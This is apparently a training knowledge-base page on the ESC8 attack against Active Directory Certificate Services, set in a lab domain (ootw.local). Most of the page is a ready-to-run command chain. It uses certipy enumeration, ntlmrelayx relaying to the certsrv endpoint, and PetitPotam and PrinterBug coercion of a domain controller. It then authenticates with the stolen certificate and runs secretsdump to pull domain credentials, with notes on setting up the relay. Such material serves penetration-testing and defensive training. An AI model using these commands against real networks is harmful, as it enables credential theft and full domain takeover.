Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ADCS / Techniques

ESC8

ESC8 abuses ADCS HTTP enrollment endpoints that accept relayed NTLM authentication. We coerce a target to authenticate to us, relay that authentication to the ADCS web endpoint, and request a certificate as the relayed principal.

Conditions

ADCS web enrollment endpoint is enabled.
Endpoint is reachable over HTTP or HTTPS without effective channel binding protection.
Target principal can enroll in the selected template.
We can coerce or capture NTLM authentication.

Find web enrollment

certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -enabled -stdout
curl -I http://ca.ootw.local/certsrv/

Start relay for a domain controller certificate

ntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2support

Coerce machine authentication with PetitPotam

PetitPotam.py -d ootw.local -u student -p 'student' 10.10.10.100 10.10.10.200

Coerce with PrinterBug

printerbug.py ootw.local/student:'student'@dc01.ootw.local 10.10.10.100

Authenticate with issued PFX

certipy auth -pfx dc01.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=dc01.ccache
klist

Use a DC certificate path

secretsdump.py -k -no-pass ootw.local/dc01\\$@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc

Windows/C2-style relay setup markers

Free or forward TCP 445 on the relay host.
Forward incoming SMB to ntlmrelayx.
Start SOCKS if the ADCS endpoint is only reachable through the target network.
Coerce the target computer to authenticate to the relay listener.

Notes

For computer accounts, request a machine-authentication template such as DomainController or Machine depending on what the relayed account can enroll in. For user accounts, use a user-authentication template.

ESC8 is a relay attack. The certificate is the post-relay credential, and it can outlive the captured NTLM exchange.